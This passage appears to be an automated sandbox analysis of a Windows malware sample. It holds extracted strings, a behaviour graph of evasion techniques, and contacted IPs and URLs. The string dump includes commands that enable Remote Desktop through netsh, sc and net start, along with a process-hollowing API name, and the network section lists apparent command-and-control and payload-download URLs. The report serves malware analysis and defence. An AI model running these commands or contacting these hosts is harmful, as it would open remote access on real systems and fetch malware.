RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: rapes.exe, 0000000B.00000003.1548416588.0000000004960000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: net start termservice
Source: rapes.exe, 0000000B.00000003.1548416588.0000000004960000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
windows-stand
Behavior
Click here to start
Slideshow Behavior Animation
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1649280 Sample: FRCe39S0oE.exe Startdate: 26/03/2025 Architecture: WINDOWS Score: 100 44 Suricata IDS alerts for network traffic 2->44 46 Found malware configuration 2->46 48 Antivirus / Scanner detection for submitted sample 2->48 50 8 other signatures 2->50 8 FRCe39S0oE.exe 5 2->8         started        12 rapes.exe 16 2->12         started        15 rapes.exe 2->15         started        process3 dnsIp4 24 C:\Users\user\AppData\Local\...\rapes.exe, PE32 8->24 dropped 26 C:\Users\user\...\rapes.exe:Zone.Identifier, ASCII 8->26 dropped 52 Detected unpacking (changes PE section rights) 8->52 54 Contains functionality to start a terminal service 8->54 56 Tries to evade debugger and weak emulator (self modifying code) 8->56 58 Tries to detect virtualization through RDTSC time measurements 8->58 17 rapes.exe 8->17         started        32 176.113.115.6, 49694, 49695, 49696 SELECTELRU Russian Federation 12->32 34 176.113.115.7, 49718, 80 SELECTELRU Russian Federation 12->34 28 C:\Users\user\AppData\Local\...\PqFatgo.exe, PE32+ 12->28 dropped 30 C:\Users\user\AppData\...\PqFatgo[1].exe, PE32+ 12->30 dropped 60 Hides threads from debuggers 12->60 62 Tries to detect sandboxes / dynamic malware analysis system (registry check) 12->62 64 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 12->64 file5 signatures6 process7 signatures8 36 Antivirus detection for dropped file 17->36 38 Multi AV Scanner detection for dropped file 17->38 40 Detected unpacking (changes PE section rights) 17->40 42 7 other signatures 17->42 20 MpCmdRun.exe 2 17->20         started        process9 process10 22 conhost.exe 20->22         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
176.113.115.7
 unknown Russian Federation
49505 SELECTELRU false
176.113.115.6
 unknown Russian Federation
49505 SELECTELRU true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://176.113.115.6/Ni9kiput/index.php false
    		high
    http://176.113.115.7/files/2043702969/PqFatgo.exe false
    • Avira URL Cloud: safe
    		 unknown